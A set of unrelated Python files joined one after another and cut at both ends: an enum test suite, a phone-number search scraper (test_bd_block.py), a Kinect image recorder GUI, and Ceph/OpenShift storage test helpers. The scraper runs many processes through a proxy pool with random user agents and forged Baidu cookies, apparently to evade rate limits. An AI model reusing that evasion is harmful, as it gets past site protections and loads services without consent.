two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
test_bd_block.py | #coding:utf-8
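# Ad-hoc scraper smoke test: queries Baidu / so.com for a phone number and
# saves the fetched pages under ./html/ (see WEB.bd_get / WEB.s60_get below).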
import os
import threading
import multiprocessing
import requests
import time
import logging
import random
import sys
import uuid
from lxml import etree
fm = "%(asctime)s-%(filename)s-%(threadName)s-%(funcName)s-%(levelname)s-%(lineno)d:\t%(message)s"
logging.basicConfig(filename='test_web.log',level=logging.INFO, format=fm)
logger = logging.getLogger()
class WEB(object):
class_flag = "web"
agent_list = [
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
]
def bd_get(self, tel=10086, proxy=None):
process_name = multiprocessing.current_process().name
content = ''
url = f'http://www.baidu.com/s?wd={tel} 地址'
try:
query_header = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"User-Agent":random.choice(WEB.agent_list),
}
query_cookie = {
"BAIDUID": "%s:FG=1" % str(uuid.uuid4()).replace('-', '').upper(),
"PSTM": "%s" % (int(time.time())),
}
resp = requests.get(url,
headers=query_header,
timeout=5,
proxies=proxy,
cookies=query_cookie
# verify=False,
)
if resp.status_code == 200:
content = resp.text
content_name = f"./html/{process_name}-{tel}.html"
encoding = resp.encoding
with open(content_name, 'w', encoding=encoding) as wh:
wh.write(content)
else:
print(f'error: unexpected status {resp.status_code}')
except Exception as e:
print(e)
def s60_get(self, formatted_tel, proxy=None):
content = ''
find_url = ''
url = f'https://www.so.com/s?q={formatted_tel}'
query_header = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cache-Control": "max-age=0",
"User-Agent": random.choice(WEB.agent_list),
}
try:
resp = requests.get(url,
headers=query_header,
timeout=5,
proxies=proxy,
# verify=False,
)
if resp.status_code == 200:
content = resp.text
find_url=url
except Exception as e:
print(e)
return content, find_url
def run(proxy=None, tel_header=''):
# all_tel = ['0536-2081111', '0429-4447001', '0391-7291224', '0731-86240655', '023-68088882', '0769-82283187', '029-89581675', '025-58377516', '0371-27978107', '0411-88466794', '0372-2188521', '021-64191703', '0759-6633355', '0591-83621655', '0451-57753888', '0511-86857186', '0792-8906059', '0477-6213200', '010-56263335', '0576-87721558', '0558-2901266', '0512-62837080', '0576-88587778', '0934-6608777', '0760-85331222', '0519-87222787', '0797-6368368', '0431-88558689', '025-84930942', '0731-82764958', '0755-26900060', '0356-6866001', '0551-68821054', '021-61900502', '025-84896440', '0557-3053321', '0416-2199966', '0316-5994005', '0731-88938586', '0317-7105896', '0533-7691090', '0755-29651666', '0791-83812048', '0357-2317171', '0591-24377106', '0574-87935837', '0371-55605888', '0531-82767663', '0755-83561317', '028-89993808', '024-52673448', '0771-5552815', '0769-22184688', '0577-88628398', '021-61206688', '0359-5035510', '028-85754413', '0592-5738999', '0738-1558126', '0873-3045110', '0752-3277895', '0370-3133501', '0311-83862838', '0516-88258138', '010-85180966', '021-50801060', '0577-65766918', '0349-5028008', '0573-85851218', '029-84491889', '0769-83314860', '024-22837758', '0591-87270629', '0595-83050088', '0354-6762958', '010-89733256', '0473-8187549', '0511-88795242', '0755-27309102', '0871-67151788', '0379-65163888', '0791-85231988', '0391-3532315', '0519-88993351', '0527-80691042', '0372-5219088', '0372-8831238', '0755-84705888', '0510-85988888', '0355-5807720', '0371-23336631', '0512-86858999', '0370-2831898', '020-32223080', '029-88216989', '0371-58579109', '0755-82960345', '022-26980351', '021-62115900', '0755-89888888']
all_tel = [f"{tel_header}%03d"%i for i in range(100) ]
w = WEB()
for t in all_tel:
w.bd_get(t, proxy)
if __name__ =="__main__":
proxy_list = [{"http":f"http://squidsz{i}.dianhua.cn:8080", "https":f"https://squidsz{i}.dianhua.cn:8080"} for i in range(61, 71)]
proxy_num = len(proxy_list)
thread_num = proxy_num * 10
st = time.time()
tel_header = ['023-680%02d'%i for i in range(thread_num)]
# print(tel_header)
t_list = [multiprocessing.Process(target=run, args=(proxy_list[i%proxy_num],tel_header[i])) for i in range(thread_num)]
for t in t_list:
t.start()
for t in t_list:
t.join()
et = time.time()
count = thread_num * 100
cost = et-st
print("thread_num: %d, total tps:%.3f, single tps:%.3f" % (thread_num, count/cost, 100/cost))
|
record_kinect_to_img.py | from navirice_get_image import KinectClient
from navirice_helpers import navirice_img_set_write_file
from navirice_helpers import navirice_image_to_np
from navirice_helpers import navirice_ir_to_np
import navirice_image_pb2
from tkinter import *
import cv2
import numpy as np
from threading import Thread
HOST = '127.0.0.1' # The remote host
PORT = 29000 # The same port as used by the server
class Window(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.init_window()
def init_window(self):
self.should_pull = True
self.should_record = False
self.should_run = True
self.session_name = "default"
self.last_count = 0
self.master.title("NAVIRICE_RECORDER")
recordButton = Button(self, text="RECORD", command=self.record)
recordButton.place(x=5, y=0)
self.session_text = Text(self, height=1, width=20)
self.session_text.place(x=5, y=30)
self.session_text.insert(END, self.session_name)
self.canvas = Canvas(self, height=30, width=30)
self.print_states()
self.pack(fill=BOTH, expand=1)
thread = Thread(target=self.thread_stream)
thread.daemon = True
thread.start()
def print_states(self):
self.canvas.delete("all")
fill = '#f00'
if(self.should_record):
fill = '#0f0'
self.canvas.create_oval(4, 0, 25, 25, outline="#000", fill=fill)
self.canvas.pack(fill=BOTH, expand=1)
self.canvas.place(x = 100, y = 0)
def record(self):
self.should_record = not self.should_record
self.print_states()
name = self.session_text.get("1.0",END)
if(len(name)):
self.session_name = name
def kill(self):
self.should_run = False
def thread_stream(self):
kc = KinectClient(HOST, PORT)
kc.navirice_capture_settings(False, True, True)
while(self.should_run):
img_set = None
if(self.should_pull):
img_set, self.last_count = kc.navirice_get_image()
if img_set is not None and img_set.IR.width > 0 and img_set.Depth.width > 0:
if self.should_record:
#processThread =Thread(target=navirice_img_set_write_file, args=[self.session_name, img_set, self.last_count])
#processThread.start()
navirice_img_set_write_file(self.session_name, img_set, self.last_count)
cv2.imshow("IR", navirice_ir_to_np(img_set.IR))
cv2.imshow("DEPTH", navirice_image_to_np(img_set.Depth))
if cv2.waitKey(1) & 0xFF == ord('q'):
print("q pressed in cv window")
del img_set
def main():
root = Tk()
root.geometry("170x65")
root.attributes('-type', 'dialog')
app = Window(root)
def on_quit():
app.kill()
exit()
root.protocol("WM_DELETE_WINDOW", on_quit)
root.mainloop()
if __name__ == "__main__":
main()
|
helpers.py | """
Helper functions file for OCS QE
"""
import logging
import re
import datetime
import statistics
import os
from subprocess import TimeoutExpired, run, PIPE
import tempfile
import time
import yaml
import threading
from ocs_ci.ocs.ocp import OCP
from uuid import uuid4
from ocs_ci.ocs.exceptions import (
TimeoutExpiredError,
UnexpectedBehaviour,
UnavailableBuildException
)
from concurrent.futures import ThreadPoolExecutor
from ocs_ci.ocs import constants, defaults, ocp, node
from ocs_ci.utility import templating
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.exceptions import CommandFailed, ResourceWrongStatusException
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import TimeoutSampler, ocsci_log_path, run_cmd
from ocs_ci.framework import config
logger = logging.getLogger(__name__)
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid (in hex) as a suffix
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
return f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get('metadata').get('name')
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create resource {resource_name}"
)
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info(f"Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None, pvc_name=None,
do_reload=True, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None, pod_dict_path=None, sa_name=None, dc_deployment=False,
raw_block_pv=False, raw_block_device=constants.RAW_BLOCK_DEVICE, replica_count=1,
pod_name=None, node_selector=None
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if interface_type == constants.CEPHBLOCKPOOL:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(
f'test-{interface}', 'pod'
)
pod_data['metadata']['name'] = pod_name
pod_data['metadata']['namespace'] = namespace
if dc_deployment:
pod_data['metadata']['labels']['app'] = pod_name
pod_data['spec']['template']['metadata']['labels']['name'] = pod_name
pod_data['spec']['replicas'] = replica_count
if pvc_name:
if dc_deployment:
pod_data['spec']['template']['spec']['volumes'][0][
'persistentVolumeClaim'
]['claimName'] = pvc_name
else:
pod_data['spec']['volumes'][0]['persistentVolumeClaim']['claimName'] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path == constants.FEDORA_DC_YAML:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'template').get('spec').get('volumes')[0].get('name')}
]
del pod_data['spec']['template']['spec']['containers'][0]['volumeMounts']
pod_data['spec']['template']['spec']['containers'][0]['volumeDevices'] = temp_dict
elif pod_dict_path == constants.NGINX_POD_YAML:
temp_dict = [
{'devicePath': raw_block_device, 'name': pod_data.get('spec').get(
'containers')[0].get('volumeMounts')[0].get('name')}
]
del pod_data['spec']['containers'][0]['volumeMounts']
pod_data['spec']['containers'][0]['volumeDevices'] = temp_dict
else:
pod_data['spec']['containers'][0]['volumeDevices'][0]['devicePath'] = raw_block_device
pod_data['spec']['containers'][0]['volumeDevices'][0]['name'] = pod_data.get('spec').get('volumes')[
0].get('name')
if node_name:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeName'] = node_name
else:
pod_data['spec']['nodeName'] = node_name
if node_selector:
if dc_deployment:
pod_data['spec']['template']['spec']['nodeSelector'] = node_selector
else:
pod_data['spec']['nodeSelector'] = node_selector
if sa_name and dc_deployment:
pod_data['spec']['template']['spec']['serviceAccountName'] = sa_name
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind='pod', namespace=namespace)).wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=pod_name + '-1-deploy',
resource_count=0, timeout=180, sleep=3
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get('metadata').get('name')
logger.info(f'Creating new Pod {pod_name} for test')
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create Pod {pod_name}"
)
return pod_obj
def create_project():
"""
Create a project
Returns:
OCP: Project object
"""
namespace = create_unique_resource_name('test', 'namespace')
project_obj = ocp.OCP(kind='Project', namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multiple_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(
constants.CSI_RBD_SECRET_YAML
)
secret_data['stringData']['userID'] = constants.ADMIN_USER
secret_data['stringData']['userKey'] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(
constants.CSI_CEPHFS_SECRET_YAML
)
del secret_data['stringData']['userID']
del secret_data['stringData']['userKey']
secret_data['stringData']['adminID'] = constants.ADMIN_USER
secret_data['stringData']['adminKey'] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data['metadata']['name'] = create_unique_resource_name(
f'test-{interface}', 'secret'
)
secret_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
return constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(pool_name=None, failure_domain=None, verify=True):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cbp'
)
)
cbp_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data['spec']['failureDomain'] = failure_domain or get_failure_domin()
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(cbp_obj.name), (
f"Block pool {cbp_obj.name} does not exist"
)
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cfs'
)
)
cfs_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(cfs_data.name), (
f"File system {cfs_data.name} does not exist"
)
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
if interface_type == constants.CEPHBLOCKPOOL:
base_sc = OCP(
kind='storageclass',
resource_name=constants.DEFAULT_STORAGECLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
base_sc = OCP(
kind='storageclass',
resource_name=constants.DEFAULT_STORAGECLASS_CEPHFS
)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type, interface_name, secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE, sc_name=None,
provisioner=None
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(e.g., 'Delete', 'Retain')
provisioner (str): The provisioner to set; if not given, defaults to
the RBD or CephFS provisioner based on interface_type
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(
constants.CSI_RBD_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data['provisioner'] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(
constants.CSI_CEPHFS_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data['parameters']['fsName'] = get_cephfs_name()
sc_data['provisioner'] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data['parameters']['pool'] = interface_name
sc_data['metadata']['name'] = (
sc_name if sc_name else create_unique_resource_name(
f'test-{interface}', 'storageclass'
)
)
sc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters']['clusterID'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['reclaimPolicy'] = reclaim_policy
try:
del sc_data['parameters']['userid']
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name, pvc_name=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None, do_reload=True, access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True to wait for the PVC to reload after creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['name'] = (
pvc_name if pvc_name else create_unique_resource_name(
'test', 'pvc'
)
)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if volume_mode:
pvc_data['spec']['volumeMode'] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name, namespace, number_of_pvc=1, size=None, do_reload=False,
access_mode=constants.ACCESS_MODE_RWO
):
"""
Create one or more PVC
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True to wait for each PVC to reload after creation,
False otherwise
access_mode (str): The kind of access mode for PVC
Returns:
list: List of PVC objects
"""
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
volume_mode = 'Block'
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name, size=size, namespace=namespace,
do_reload=do_reload, access_mode=access_mode, volume_mode=volume_mode
) for _ in range(number_of_pvc)
]
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exists
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph osd lspools'
):
logger.info(f'POOLS are {pools}')
for pool in pools:
if pool_name in pool.get('poolname'):
return True
except TimeoutExpiredError:
return False
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph auth get-key client.admin')
return out['key']
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph fs ls')
return out[0]['data_pools'][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if the CephFileSystem exists on both the Ceph and OCP
sides, False otherwise (the failure cause is logged)
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get('metadata').get('name'):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info(
"Filesystem %s was not created on the OpenShift side", fs_name
)
return False
try:
